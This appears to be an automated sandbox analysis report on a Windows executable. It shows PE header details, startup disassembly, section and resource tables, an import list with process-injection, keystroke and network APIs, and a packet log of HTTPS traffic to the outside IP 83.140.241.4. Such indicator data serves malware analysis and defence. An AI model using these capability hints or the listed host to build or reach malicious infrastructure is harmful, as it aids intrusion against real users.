                                                                      DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                      Time Stamp:0x66FC4D92 [Tue Oct 1 19:29:22 2024 UTC]
                                                                      TLS Callbacks:
                                                                      CLR (.Net) Version:
                                                                      OS Version Major:5
                                                                      OS Version Minor:2
                                                                      File Version Major:5
                                                                      File Version Minor:2
                                                                      Subsystem Version Major:5
                                                                      Subsystem Version Minor:2
                                                                      Import Hash:fadc5a257419d2541a6b13dfb5e311e2
                                                                      Instruction
                                                                      dec eax
                                                                      sub esp, 28h
                                                                      call 00007F8C24834730h
                                                                      dec eax
                                                                      add esp, 28h
                                                                      jmp 00007F8C2483403Fh
                                                                      int3
                                                                      int3
                                                                      inc eax
                                                                      push ebx
                                                                      dec eax
                                                                      sub esp, 20h
                                                                      dec eax
                                                                      mov ebx, ecx
                                                                      dec eax
                                                                      mov eax, edx
                                                                      dec eax
                                                                      lea ecx, dword ptr [0009466Dh]
                                                                      dec eax
                                                                      mov dword ptr [ebx], ecx
                                                                      dec eax
                                                                      lea edx, dword ptr [ebx+08h]
                                                                      xor ecx, ecx
                                                                      dec eax
                                                                      mov dword ptr [edx], ecx
                                                                      dec eax
                                                                      mov dword ptr [edx+08h], ecx
                                                                      dec eax
                                                                      lea ecx, dword ptr [eax+08h]
                                                                      call 00007F8C24835C49h
                                                                      dec eax
                                                                      lea eax, dword ptr [0009467Dh]
                                                                      dec eax
                                                                      mov dword ptr [ebx], eax
                                                                      dec eax
                                                                      mov eax, ebx
                                                                      dec eax
                                                                      add esp, 20h
                                                                      pop ebx
                                                                      ret
                                                                      int3
                                                                      dec eax
                                                                      and dword ptr [ecx+10h], 00000000h
                                                                      dec eax
                                                                      lea eax, dword ptr [00094674h]
                                                                      dec eax
                                                                      mov dword ptr [ecx+08h], eax
                                                                      dec eax
                                                                      lea eax, dword ptr [00094659h]
                                                                      dec eax
                                                                      mov dword ptr [ecx], eax
                                                                      dec eax
                                                                      mov eax, ecx
                                                                      ret
                                                                      int3
                                                                      int3
                                                                      inc eax
                                                                      push ebx
                                                                      dec eax
                                                                      sub esp, 20h
                                                                      dec eax
                                                                      mov ebx, ecx
                                                                      dec eax
                                                                      mov eax, edx
                                                                      dec eax
                                                                      lea ecx, dword ptr [0009460Dh]
                                                                      dec eax
                                                                      mov dword ptr [ebx], ecx
                                                                      dec eax
                                                                      lea edx, dword ptr [ebx+08h]
                                                                      xor ecx, ecx
                                                                      dec eax
                                                                      mov dword ptr [edx], ecx
                                                                      dec eax
                                                                      mov dword ptr [edx+08h], ecx
                                                                      dec eax
                                                                      lea ecx, dword ptr [eax+08h]
                                                                      call 00007F8C24835BE9h
                                                                      dec eax
                                                                      lea eax, dword ptr [00094645h]
                                                                      dec eax
                                                                      mov dword ptr [ebx], eax
                                                                      dec eax
                                                                      mov eax, ebx
                                                                      dec eax
                                                                      add esp, 20h
                                                                      pop ebx
                                                                      ret
                                                                      int3
                                                                      dec eax
                                                                      and dword ptr [ecx+10h], 00000000h
                                                                      dec eax
                                                                      lea eax, dword ptr [0009463Ch]
                                                                      dec eax
                                                                      mov dword ptr [ecx+08h], eax
                                                                      dec eax
                                                                      lea eax, dword ptr [00000021h]
                                                                      Programming Language:
                                                                      • [ C ] VS2008 SP1 build 30729
                                                                      • [IMP] VS2008 SP1 build 30729
                                                                      NameVirtual AddressVirtual Size Is in Section
                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0xe5c100x17c.rdata
                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0xfb0000xed7cc.rsrc
                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0xf40000x6f48.pdata
                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x1e90000xa74.reloc
                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0xc70500x1c.rdata
                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_TLS0xd9aa00x28.rdata
                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xc70700x100.rdata
                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_IAT0xb50000x1138.rdata
                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                      .text0x10000xb33280xb3400507a8505198e35cc9675301d53e3b1c4False0.5503358721234309data6.5212967575920215IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                      .rdata0xb50000x342040x344009eda36be0cf076085a2f9772c1ee5803False0.30884139503588515data5.360588077813426IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                      .data0xea0000x91200x5000ec6b77d6ef8898b0d3b7d48c042d66a0False0.040673828125DOS executable (block device driver)0.5749243362866429IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                      .pdata0xf40000x6f480x70004416e27f8be9f9271c439d2fd34d1b2dFalse0.49612862723214285data5.911479421450324IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                      .rsrc0xfb0000xed7cc0xed800bec808d7dc177cca1390dc1ada2ac9e2False0.9320888157894737data7.852477011959672IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                      .reloc0x1e90000xa740xc005ddb0e422ace102fe530e589a0cbec6fFalse0.4850260416666667data5.139847116863034IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                      RT_ICON0xfb5180x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
                                                                      RT_ICON0xfb6400x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
                                                                      RT_ICON0xfb7680x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                                                                      RT_ICON0xfb8900x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096EnglishGreat Britain0.6071763602251408
                                                                      RT_ICON0xfc9380x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216EnglishGreat Britain0.525103734439834
                                                                      RT_ICON0xfeee00x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16384EnglishGreat Britain0.47821209258384506
                                                                      RT_ICON0x1031080x10828Device independent bitmap graphic, 128 x 256 x 32, image size 65536EnglishGreat Britain0.36631964982846327
                                                                      RT_ICON0x1139300xc34ePNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishGreat Britain0.9994999799991999
                                                                      RT_MENU0x11fc800x50dataEnglishGreat Britain0.9
                                                                      RT_STRING0x11fcd00x594dataEnglishGreat Britain0.3333333333333333
                                                                      RT_STRING0x1202640x68adataEnglishGreat Britain0.2735961768219833
                                                                      RT_STRING0x1208f00x490dataEnglishGreat Britain0.3715753424657534
                                                                      RT_STRING0x120d800x5fcdataEnglishGreat Britain0.3087467362924282
                                                                      RT_STRING0x12137c0x65cdataEnglishGreat Britain0.34336609336609336
                                                                      RT_STRING0x1219d80x466dataEnglishGreat Britain0.3605683836589698
                                                                      RT_STRING0x121e400x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishGreat Britain0.502906976744186
                                                                      RT_RCDATA0x121f980xc62e0data1.00031537036307
                                                                      RT_GROUP_ICON0x1e82780x4cdataEnglishGreat Britain0.8157894736842105
                                                                      RT_GROUP_ICON0x1e82c40x14dataEnglishGreat Britain1.25
                                                                      RT_GROUP_ICON0x1e82d80x14dataEnglishGreat Britain1.15
                                                                      RT_GROUP_ICON0x1e82ec0x14dataEnglishGreat Britain1.25
                                                                      RT_VERSION0x1e83000xdcdataEnglishGreat Britain0.6181818181818182
                                                                      RT_MANIFEST0x1e83dc0x3efASCII text, with CRLF line terminatorsEnglishGreat Britain0.5074478649453823
                                                                      DLLImport
                                                                      WSOCK32.dllgethostbyname, recv, send, socket, inet_ntoa, setsockopt, ntohs, WSACleanup, WSAStartup, sendto, htons, __WSAFDIsSet, select, accept, listen, bind, inet_addr, ioctlsocket, recvfrom, WSAGetLastError, closesocket, gethostname, connect
                                                                      VERSION.dllGetFileVersionInfoW, VerQueryValueW, GetFileVersionInfoSizeW
                                                                      WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                                                                      COMCTL32.dllImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
                                                                      MPR.dllWNetGetConnectionW, WNetCancelConnection2W, WNetUseConnectionW, WNetAddConnection2W
                                                                      WININET.dllHttpOpenRequestW, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, InternetConnectW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetQueryDataAvailable
                                                                      PSAPI.DLLGetProcessMemoryInfo
                                                                      IPHLPAPI.DLLIcmpSendEcho, IcmpCloseHandle, IcmpCreateFile
                                                                      USERENV.dllDestroyEnvironmentBlock, LoadUserProfileW, CreateEnvironmentBlock, UnloadUserProfile
                                                                      UxTheme.dllIsThemeActive
                                                                      KERNEL32.dllWaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, GetLongPathNameW, GetShortPathNameW, DeleteFileW, FindNextFileW, CopyFileExW, GetFullPathNameW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, LoadResource, LockResource, SizeofResource, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, LoadLibraryW, GetLocalTime, CompareStringW, EnterCriticalSection, DuplicateHandle, GetStdHandle, CreatePipe, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, VirtualAlloc, SetCurrentDirectoryW, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, RtlLookupFunctionEntry, RtlVirtualUnwind, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, IsProcessorFeaturePresent, GetSystemTimeAsFileTime, CreateThread, GetCurrentProcess, GetCurrentThread, LeaveCriticalSection, InitializeSListHead, RtlUnwindEx, RtlPcToFileHeader, SetLastError, TlsAlloc, ResetEvent, WaitForSingleObjectEx, TlsGetValue, TlsSetValue, TlsFree, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, ResumeThread, FreeLibraryAndExitThread, GetACP, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetStringTypeW, GetFileType, SetStdHandle, GetConsoleCP, GetConsoleMode, ReadConsoleW, GetTimeZoneInformation, FindFirstFileExW, IsValidCodePage, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetEnvironmentVariableA, CloseHandle, WriteConsoleW, MoveFileW, RtlCaptureContext
                                                                      USER32.dllGetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, GetWindowLongW, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongPtrW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, SetWindowLongPtrW, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, PeekMessageW, GetInputState, UnregisterHotKey, CharLowerBuffW, MonitorFromPoint, MonitorFromRect, LoadImageW, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, IsCharUpperW, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, CheckMenuRadioItem, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, GetClipboardData, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, IsCharLowerW, IsCharAlphaNumericW, IsCharAlphaW, GetKeyboardLayoutNameW, ClientToScreen, RegisterHotKey, GetCursorInfo, SetWindowPos, CopyImage, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, SetMenuDefaultItem, CloseClipboard, GetWindowRect, SetUserObjectSecurity, IsClipboardFormatAvailable, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, OpenClipboard, GetWindowLongPtrW
                                                                      GDI32.dllEndPath, DeleteObject, GetDeviceCaps, ExtCreatePen, StrokePath, SetPixel, CloseFigure, LineTo, AngleArc, MoveToEx, Ellipse, PolyDraw, GetTextExtentPoint32W, CreateCompatibleBitmap, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, GetStockObject, CreateDCW, GetPixel, DeleteDC, GetDIBits, StretchBlt, SelectObject, CreateCompatibleDC, StrokeAndFillPath
                                                                      COMDLG32.dllGetSaveFileNameW, GetOpenFileNameW
                                                                      ADVAPI32.dllGetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, FreeSid, GetTokenInformation, RegSetValueExW, GetSecurityDescriptorDacl, GetAclInformation, RegCreateKeyExW, AddAce, SetSecurityDescriptorDacl, InitiateSystemShutdownExW, GetUserNameW
                                                                      SHELL32.dllDragFinish, DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW
                                                                      ole32.dllCoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket
                                                                      OLEAUT32.dllVariantChangeType, DispCallFunc, CreateStdDispatch, CreateDispTypeInfo, UnRegisterTypeLib, UnRegisterTypeLibForUser, RegisterTypeLibForUser, RegisterTypeLib, LoadTypeLibEx, VariantCopyInd, VariantTimeToSystemTime, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, VariantInit, VariantClear, VariantCopy, SysAllocString, SafeArrayCreateVector, VarR8FromDec, SafeArrayAllocDescriptorEx, SafeArrayAllocData, SysStringLen, SafeArrayGetVartype, OleLoadPicture, QueryPathOfRegTypeLib, SysReAllocString, SafeArrayAccessData
                                                                      Language of compilation systemCountry where language is spokenMap
                                                                      EnglishGreat Britain
                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                      Oct 7, 2024 21:30:02.084697962 CEST49730443192.168.2.483.140.241.4
                                                                      Oct 7, 2024 21:30:02.084747076 CEST4434973083.140.241.4192.168.2.4
                                                                      Oct 7, 2024 21:30:02.084844112 CEST49730443192.168.2.483.140.241.4
                                                                      Oct 7, 2024 21:30:02.096025944 CEST49730443192.168.2.483.140.241.4
                                                                      Oct 7, 2024 21:30:02.096056938 CEST4434973083.140.241.4192.168.2.4
                                                                      Oct 7, 2024 21:30:02.862026930 CEST4434973083.140.241.4192.168.2.4
                                                                      Oct 7, 2024 21:30:02.862095118 CEST49730443192.168.2.483.140.241.4
                                                                      Oct 7, 2024 21:30:02.866838932 CEST49730443192.168.2.483.140.241.4
                                                                      Oct 7, 2024 21:30:02.866856098 CEST4434973083.140.241.4192.168.2.4
                                                                      Oct 7, 2024 21:30:02.867249966 CEST4434973083.140.241.4192.168.2.4
                                                                      Oct 7, 2024 21:30:02.879070044 CEST49730443192.168.2.483.140.241.4
                                                                      Oct 7, 2024 21:30:02.923398018 CEST4434973083.140.241.4192.168.2.4
                                                                      Oct 7, 2024 21:30:03.431181908 CEST4434973083.140.241.4192.168.2.4
                                                                      Oct 7, 2024 21:30:03.431230068 CEST4434973083.140.241.4192.168.2.4
                                                                      Oct 7, 2024 21:30:03.431256056 CEST4434973083.140.241.4192.168.2.4
                                                                      Oct 7, 2024 21:30:03.431291103 CEST49730443192.168.2.483.140.241.4
                                                                      Oct 7, 2024 21:30:03.431329012 CEST4434973083.140.241.4192.168.2.4
                                                                      Oct 7, 2024 21:30:03.431343079 CEST49730443192.168.2.483.140.241.4
                                                                      Oct 7, 2024 21:30:03.431425095 CEST49730443192.168.2.483.140.241.4
                                                                      Oct 7, 2024 21:30:03.433111906 CEST4434973083.140.241.4192.168.2.4
                                                                      Oct 7, 2024 21:30:03.433140039 CEST4434973083.140.241.4192.168.2.4
                                                                      Oct 7, 2024 21:30:03.433166027 CEST49730443192.168.2.483.140.241.4
                                                                      Oct 7, 2024 21:30:03.433172941 CEST4434973083.140.241.4192.168.2.4
                                                                      Oct 7, 2024 21:30:03.433198929 CEST49730443192.168.2.483.140.241.4
                                                                      Oct 7, 2024 21:30:03.433355093 CEST49730443192.168.2.483.140.241.4
                                                                      Oct 7, 2024 21:30:03.538320065 CEST4434973083.140.241.4192.168.2.4
                                                                      Oct 7, 2024 21:30:03.538351059 CEST4434973083.140.241.4192.168.2.4
                                                                      Oct 7, 2024 21:30:03.538427114 CEST49730443192.168.2.483.140.241.4
                                                                      Oct 7, 2024 21:30:03.538427114 CEST49730443192.168.2.483.140.241.4
                                                                      Oct 7, 2024 21:30:03.538449049 CEST4434973083.140.241.4192.168.2.4
                                                                      Oct 7, 2024 21:30:03.538562059 CEST49730443192.168.2.483.140.241.4
                                                                      Oct 7, 2024 21:30:03.541508913 CEST4434973083.140.241.4192.168.2.4
                                                                      Oct 7, 2024 21:30:03.541534901 CEST4434973083.140.241.4192.168.2.4
                                                                      Oct 7, 2024 21:30:03.541560888 CEST49730443192.168.2.483.140.241.4
                                                                      Oct 7, 2024 21:30:03.541565895 CEST4434973083.140.241.4192.168.2.4
                                                                      Oct 7, 2024 21:30:03.541598082 CEST49730443192.168.2.483.140.241.4
                                                                      Oct 7, 2024 21:30:03.541635990 CEST49730443192.168.2.483.140.241.4
                                                                      Oct 7, 2024 21:30:03.544511080 CEST4434973083.140.241.4192.168.2.4
                                                                      Oct 7, 2024 21:30:03.544538975 CEST4434973083.140.241.4192.168.2.4
                                                                      Oct 7, 2024 21:30:03.544569969 CEST49730443192.168.2.483.140.241.4
                                                                      Oct 7, 2024 21:30:03.544574022 CEST4434973083.140.241.4192.168.2.4
                                                                      Oct 7, 2024 21:30:03.544629097 CEST49730443192.168.2.483.140.241.4
                                                                      Oct 7, 2024 21:30:03.544629097 CEST49730443192.168.2.483.140.241.4
                                                                      Oct 7, 2024 21:30:03.547097921 CEST4434973083.140.241.4192.168.2.4
                                                                      Oct 7, 2024 21:30:03.547169924 CEST4434973083.140.241.4192.168.2.4
                                                                      Oct 7, 2024 21:30:03.547220945 CEST49730443192.168.2.483.140.241.4
                                                                      Oct 7, 2024 21:30:03.547224998 CEST4434973083.140.241.4192.168.2.4
                                                                      Oct 7, 2024 21:30:03.547367096 CEST49730443192.168.2.483.140.241.4
                                                                      Oct 7, 2024 21:30:03.683109999 CEST4434973083.140.241.4192.168.2.4
                                                                      Oct 7, 2024 21:30:03.683139086 CEST4434973083.140.241.4192.168.2.4
                                                                      Oct 7, 2024 21:30:03.686415911 CEST4434973083.140.241.4192.168.2.4
                                                                      Oct 7, 2024 21:30:03.686440945 CEST49730443192.168.2.483.140.241.4
                                                                      Oct 7, 2024 21:30:03.686458111 CEST4434973083.140.241.4192.168.2.4
                                                                      Oct 7, 2024 21:30:03.686495066 CEST49730443192.168.2.483.140.241.4
                                                                      Oct 7, 2024 21:30:03.686631918 CEST49730443192.168.2.483.140.241.4
                                                                      Oct 7, 2024 21:30:03.688842058 CEST4434973083.140.241.4192.168.2.4
                                                                      Oct 7, 2024 21:30:03.688865900 CEST4434973083.140.241.4192.168.2.4
                                                                      Oct 7, 2024 21:30:03.688941002 CEST49730443192.168.2.483.140.241.4
                                                                      Oct 7, 2024 21:30:03.688941002 CEST49730443192.168.2.483.140.241.4
                                                                      Oct 7, 2024 21:30:03.688946962 CEST4434973083.140.241.4192.168.2.4
                                                                      Oct 7, 2024 21:30:03.690525055 CEST4434973083.140.241.4192.168.2.4
                                                                      Oct 7, 2024 21:30:03.690546989 CEST4434973083.140.241.4192.168.2.4
                                                                      Oct 7, 2024 21:30:03.690583944 CEST49730443192.168.2.483.140.241.4
                                                                      Oct 7, 2024 21:30:03.690588951 CEST4434973083.140.241.4192.168.2.4
                                                                      Oct 7, 2024 21:30:03.690614939 CEST49730443192.168.2.483.140.241.4
                                                                      Oct 7, 2024 21:30:03.693089008 CEST4434973083.140.241.4192.168.2.4
                                                                      Oct 7, 2024 21:30:03.693106890 CEST4434973083.140.241.4192.168.2.4
                                                                      Oct 7, 2024 21:30:03.693145990 CEST49730443192.168.2.483.140.241.4
                                                                      Oct 7, 2024 21:30:03.693151951 CEST4434973083.140.241.4192.168.2.4
                                                                      Oct 7, 2024 21:30:03.693177938 CEST49730443192.168.2.483.140.241.4
                                                                      Oct 7, 2024 21:30:03.694807053 CEST4434973083.140.241.4192.168.2.4
                                                                      Oct 7, 2024 21:30:03.694830894 CEST4434973083.140.241.4192.168.2.4
                                                                      Oct 7, 2024 21:30:03.694853067 CEST49730443192.168.2.483.140.241.4
                                                                      Oct 7, 2024 21:30:03.694859028 CEST4434973083.140.241.4192.168.2.4
                                                                      Oct 7, 2024 21:30:03.695425034 CEST49730443192.168.2.483.140.241.4
                                                                      Oct 7, 2024 21:30:03.741087914 CEST49730443192.168.2.483.140.241.4
                                                                      Oct 7, 2024 21:30:03.812248945 CEST4434973083.140.241.4192.168.2.4
                                                                      Oct 7, 2024 21:30:03.812294006 CEST4434973083.140.241.4192.168.2.4
                                                                      Oct 7, 2024 21:30:03.812408924 CEST49730443192.168.2.483.140.241.4
                                                                      Oct 7, 2024 21:30:03.812408924 CEST49730443192.168.2.483.140.241.4
                                                                      Oct 7, 2024 21:30:03.812432051 CEST4434973083.140.241.4192.168.2.4
                                                                      Oct 7, 2024 21:30:03.815421104 CEST49730443192.168.2.483.140.241.4
                                                                      Oct 7, 2024 21:30:03.837470055 CEST4434973083.140.241.4192.168.2.4
                                                                      Oct 7, 2024 21:30:03.837517023 CEST4434973083.140.241.4192.168.2.4
                                                                      Oct 7, 2024 21:30:03.837565899 CEST49730443192.168.2.483.140.241.4
                                                                      Oct 7, 2024 21:30:03.837575912 CEST4434973083.140.241.4192.168.2.4
                                                                      Oct 7, 2024 21:30:03.837625980 CEST49730443192.168.2.483.140.241.4
                                                                      Oct 7, 2024 21:30:03.837625980 CEST49730443192.168.2.483.140.241.4
                                                                      Oct 7, 2024 21:30:03.839843988 CEST4434973083.140.241.4192.168.2.4
                                                                      Oct 7, 2024 21:30:03.839888096 CEST4434973083.140.241.4192.168.2.4
                                                                      Oct 7, 2024 21:30:03.839932919 CEST49730443192.168.2.483.140.241.4
                                                                      Oct 7, 2024 21:30:03.839946985 CEST4434973083.140.241.4192.168.2.4
                                                                      Oct 7, 2024 21:30:03.839982033 CEST49730443192.168.2.483.140.241.4
                                                                      Oct 7, 2024 21:30:03.841835976 CEST4434973083.140.241.4192.168.2.4
                                                                      Oct 7, 2024 21:30:03.841892004 CEST4434973083.140.241.4192.168.2.4
                                                                      Oct 7, 2024 21:30:03.841928005 CEST49730443192.168.2.483.140.241.4
                                                                      Oct 7, 2024 21:30:03.841933966 CEST4434973083.140.241.4192.168.2.4
                                                                      Oct 7, 2024 21:30:03.841958046 CEST49730443192.168.2.483.140.241.4
                                                                      Oct 7, 2024 21:30:03.843321085 CEST4434973083.140.241.4192.168.2.4
                                                                      Oct 7, 2024 21:30:03.843367100 CEST49730443192.168.2.483.140.241.4
                                                                      Oct 7, 2024 21:30:03.843368053 CEST4434973083.140.241.4192.168.2.4
                                                                      Oct 7, 2024 21:30:03.843424082 CEST49730443192.168.2.483.140.241.4
                                                                      Oct 7, 2024 21:30:03.843431950 CEST4434973083.140.241.4192.168.2.4
                                                                      Oct 7, 2024 21:30:03.843468904 CEST49730443192.168.2.483.140.241.4
                                                                      Oct 7, 2024 21:30:03.844769955 CEST49730443192.168.2.483.140.241.4
                                                                      Oct 7, 2024 21:30:03.844952106 CEST4434973083.140.241.4192.168.2.4
                                                                      Oct 7, 2024 21:30:03.845001936 CEST4434973083.140.241.4192.168.2.4
                                                                      Oct 7, 2024 21:30:03.845041990 CEST49730443192.168.2.483.140.241.4
                                                                      Oct 7, 2024 21:30:03.845053911 CEST4434973083.140.241.4192.168.2.4
                                                                      Oct 7, 2024 21:30:03.845087051 CEST49730443192.168.2.483.140.241.4
                                                                      Oct 7, 2024 21:30:03.846863985 CEST4434973083.140.241.4192.168.2.4
                                                                      Oct 7, 2024 21:30:03.846913099 CEST4434973083.140.241.4192.168.2.4
                                                                      Oct 7, 2024 21:30:03.846963882 CEST49730443192.168.2.483.140.241.4
                                                                      Oct 7, 2024 21:30:03.846976995 CEST4434973083.140.241.4192.168.2.4
                                                                      Oct 7, 2024 21:30:03.847007036 CEST49730443192.168.2.483.140.241.4
                                                                      Oct 7, 2024 21:30:03.848664999 CEST4434973083.140.241.4192.168.2.4
                                                                      Oct 7, 2024 21:30:03.848707914 CEST4434973083.140.241.4192.168.2.4
                                                                      Oct 7, 2024 21:30:03.848714113 CEST49730443192.168.2.483.140.241.4
